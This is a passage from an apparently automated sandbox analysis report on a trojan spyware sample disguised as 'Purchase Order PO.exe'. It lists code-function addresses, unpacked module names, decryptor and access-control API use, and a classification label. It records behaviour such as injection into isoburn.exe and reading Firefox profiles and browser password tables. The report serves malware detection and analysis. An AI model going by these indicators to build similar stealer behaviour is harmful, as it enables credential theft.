                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764EE100_2_0764EE10
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764CDAB0_2_0764CDAB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764CDB80_2_0764CDB8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764E9D80_2_0764E9D8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0764C9800_2_0764C980
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_076438780_2_07643878
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_076438880_2_07643888
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004185833_2_00418583
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004030403_2_00403040
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004010003_2_00401000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040E1083_2_0040E108
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040E1133_2_0040E113
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004012703_2_00401270
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004022A53_2_004022A5
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004022B03_2_004022B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00402B213_2_00402B21
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00402B303_2_00402B30
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040242E3_2_0040242E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004024303_2_00402430
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0042ECA33_2_0042ECA3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040FDAB3_2_0040FDAB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040FDB33_2_0040FDB3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004027103_2_00402710
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040DFC33_2_0040DFC3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0040FFD33_2_0040FFD3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_004167933_2_00416793
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102A1183_2_0102A118
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010181583_2_01018158
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010501AA3_2_010501AA
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010481CC3_2_010481CC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010220003_2_01022000
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F801003_2_00F80100
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104A3523_2_0104A352
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010503E63_2_010503E6
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E3F03_2_00F9E3F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010302743_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010102C03_2_010102C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010505913_2_01050591
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010344203_2_01034420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010424463_2_01042446
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F905353_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103E4F63_2_0103E4F6
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAC6E03_2_00FAC6E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8C7C03_2_00F8C7C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F907703_2_00F90770
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB47503_2_00FB4750
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE8F03_2_00FBE8F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F768B83_2_00F768B8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0105A9A63_2_0105A9A6
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9A8403_2_00F9A840
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F928403_2_00F92840
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F929A03_2_00F929A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA69623_2_00FA6962
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104AB403_2_0104AB40
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8EA803_2_00F8EA80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01046BD73_2_01046BD7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F80CF23_2_00F80CF2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102CD1F3_2_0102CD1F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90C003_2_00F90C00
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8ADE03_2_00F8ADE0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA8DBF3_2_00FA8DBF
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030CB53_2_01030CB5
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9AD003_2_00F9AD00
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01032F303_2_01032F30
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01004F403_2_01004F40
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA2E903_2_00FA2E90
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90E593_2_00F90E59
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100EFA03_2_0100EFA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9CFE03_2_00F9CFE0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104EE263_2_0104EE26
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F82FC83_2_00F82FC8
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104CE933_2_0104CE93
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB0F303_2_00FB0F30
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD2F283_2_00FD2F28
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104EEDB3_2_0104EEDB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F970C03_2_00F970C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0105B16B3_2_0105B16B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9B1B03_2_00F9B1B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7F1723_2_00F7F172
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC516C3_2_00FC516C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103F0CC3_2_0103F0CC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104F0E03_2_0104F0E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010470E93_2_010470E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104132D3_2_0104132D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAB2C03_2_00FAB2C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F952A03_2_00F952A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD739A3_2_00FD739A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7D34C3_2_00F7D34C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010312ED3_2_010312ED
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010475713_2_01047571
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F814603_2_00F81460
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102D5B03_2_0102D5B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104F43F3_2_0104F43F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104F7B03_2_0104F7B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010416CC3_2_010416CC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010259103_2_01025910
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F938E03_2_00F938E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFD8003_2_00FFD800
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F999503_2_00F99950
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAB9503_2_00FAB950
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FD5AA03_2_00FD5AA0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104FB763_2_0104FB76
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01005BF03_2_01005BF0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FCDBF93_2_00FCDBF9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01047A463_2_01047A46
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104FA493_2_0104FA49
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01003A6C3_2_01003A6C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAFB803_2_00FAFB80
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01031AA33_2_01031AA3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102DAAC3_2_0102DAAC
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103DAC63_2_0103DAC6
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01041D5A3_2_01041D5A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01047D733_2_01047D73
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01009C323_2_01009C32
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAFDC03_2_00FAFDC0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F93D403_2_00F93D40
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104FCF23_2_0104FCF2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104FF093_2_0104FF09
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F99EB03_2_00F99EB0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104FFB13_2_0104FFB1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F91F923_2_00F91F92
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F5E4F66_2_04F5E4F6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F624466_2_04F62446
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F705916_2_04F70591
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB05356_2_04EB0535
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ECC6E06_2_04ECC6E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EAC7C06_2_04EAC7C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB07706_2_04EB0770
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ED47506_2_04ED4750
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F420006_2_04F42000
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F681CC6_2_04F681CC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F701AA6_2_04F701AA
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F381586_2_04F38158
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EA01006_2_04EA0100
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F4A1186_2_04F4A118
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F302C06_2_04F302C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F502746_2_04F50274
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F703E66_2_04F703E6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EBE3F06_2_04EBE3F0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6A3526_2_04F6A352
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EA0CF26_2_04EA0CF2
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F50CB56_2_04F50CB5
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB0C006_2_04EB0C00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EAADE06_2_04EAADE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EC8DBF6_2_04EC8DBF
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EBAD006_2_04EBAD00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6EEDB6_2_04F6EEDB
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6CE936_2_04F6CE93
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EC2E906_2_04EC2E90
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB0E596_2_04EB0E59
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6EE266_2_04F6EE26
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EBCFE06_2_04EBCFE0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EA2FC86_2_04EA2FC8
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F2EFA06_2_04F2EFA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F24F406_2_04F24F40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EF2F286_2_04EF2F28
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ED0F306_2_04ED0F30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EDE8F06_2_04EDE8F0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04E968B86_2_04E968B8
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EBA8406_2_04EBA840
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB28406_2_04EB2840
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB29A06_2_04EB29A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F7A9A66_2_04F7A9A6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EC69626_2_04EC6962
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EAEA806_2_04EAEA80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F66BD76_2_04F66BD7
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6AB406_2_04F6AB40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EA14606_2_04EA1460
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6F43F6_2_04F6F43F
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F4D5B06_2_04F4D5B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F675716_2_04F67571
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F616CC6_2_04F616CC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6F7B06_2_04F6F7B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6F0E06_2_04F6F0E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F670E96_2_04F670E9
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB70C06_2_04EB70C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F5F0CC6_2_04F5F0CC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EBB1B06_2_04EBB1B0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EE516C6_2_04EE516C
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04E9F1726_2_04E9F172
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F7B16B6_2_04F7B16B
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F512ED6_2_04F512ED
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ECB2C06_2_04ECB2C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB52A06_2_04EB52A0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EF739A6_2_04EF739A
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04E9D34C6_2_04E9D34C
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6132D6_2_04F6132D
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6FCF26_2_04F6FCF2
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F29C326_2_04F29C32
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ECFDC06_2_04ECFDC0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F67D736_2_04F67D73
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB3D406_2_04EB3D40
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F61D5A6_2_04F61D5A
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB9EB06_2_04EB9EB0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6FFB16_2_04F6FFB1
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB1F926_2_04EB1F92
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6FF096_2_04F6FF09
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB38E06_2_04EB38E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F1D8006_2_04F1D800
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EB99506_2_04EB9950
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ECB9506_2_04ECB950
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F459106_2_04F45910
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F5DAC66_2_04F5DAC6
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EF5AA06_2_04EF5AA0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F4DAAC6_2_04F4DAAC
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F23A6C6_2_04F23A6C
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F67A466_2_04F67A46
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6FA496_2_04F6FA49
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F25BF06_2_04F25BF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04EEDBF96_2_04EEDBF9
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04ECFB806_2_04ECFB80
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_04F6FB766_2_04F6FB76
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED1C306_2_02ED1C30
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED52C06_2_02ED52C0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ED34D06_2_02ED34D0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ECCAE86_2_02ECCAE8
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ECCAF06_2_02ECCAF0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02EEB9E06_2_02EEB9E0
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ECAE456_2_02ECAE45
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ECAE506_2_02ECAE50
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ECAD006_2_02ECAD00
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_02ECCD106_2_02ECCD10
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_051CE7706_2_051CE770
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_051CE3D36_2_051CE3D3
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_051CE2B46_2_051CE2B4
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_051CD8386_2_051CD838
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 00FD7E54 appears 102 times
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 00F7B970 appears 280 times
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 00FC5130 appears 58 times
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 00FFEA12 appears 86 times
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 0100F290 appears 105 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04E9B970 appears 275 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04F2F290 appears 105 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EE5130 appears 56 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04EF7E54 appears 99 times
                      Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04F1EA12 appears 86 times
                      Source: Purchase Order PO.exe, 00000000.00000002.2068922088.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order PO.exe
                      Source: Purchase Order PO.exe, 00000000.00000002.2072668153.0000000005A60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order PO.exe
                      Source: Purchase Order PO.exe, 00000000.00000002.2070921717.0000000003F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order PO.exe
                      Source: Purchase Order PO.exe, 00000000.00000002.2073850641.00000000091A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order PO.exe
                      Source: Purchase Order PO.exe, 00000000.00000000.2038064683.0000000000A82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCGFg.exeJ vs Purchase Order PO.exe
                      Source: Purchase Order PO.exe, 00000003.00000002.2438615849.000000000107D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order PO.exe
                      Source: Purchase Order PO.exe, 00000003.00000002.2437625544.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs Purchase Order PO.exe
                      Source: Purchase Order PO.exeBinary or memory string: OriginalFilenameCGFg.exeJ vs Purchase Order PO.exe
                      Source: Purchase Order PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Purchase Order PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Purchase Order PO.exe.4033880.2.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Purchase Order PO.exe.40538a0.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Purchase Order PO.exe.5a60000.7.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, HVaY5fj05oNEYQ5bkR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, HVaY5fj05oNEYQ5bkR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, n51bqfhhcdaFKIjyDe.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, n51bqfhhcdaFKIjyDe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Purchase Order PO.exe.41873d0.5.raw.unpack, n51bqfhhcdaFKIjyDe.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, n51bqfhhcdaFKIjyDe.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, n51bqfhhcdaFKIjyDe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Purchase Order PO.exe.91a0000.8.raw.unpack, n51bqfhhcdaFKIjyDe.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/5
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order PO.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\l420377xJump to behavior
                      Source: Purchase Order PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Purchase Order PO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: isoburn.exe, 00000006.00000003.2620719358.000000000327F000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3282862649.0000000003272000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2614158361.0000000003251000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3282862649.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2614266115.0000000003272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Purchase Order PO.exeReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
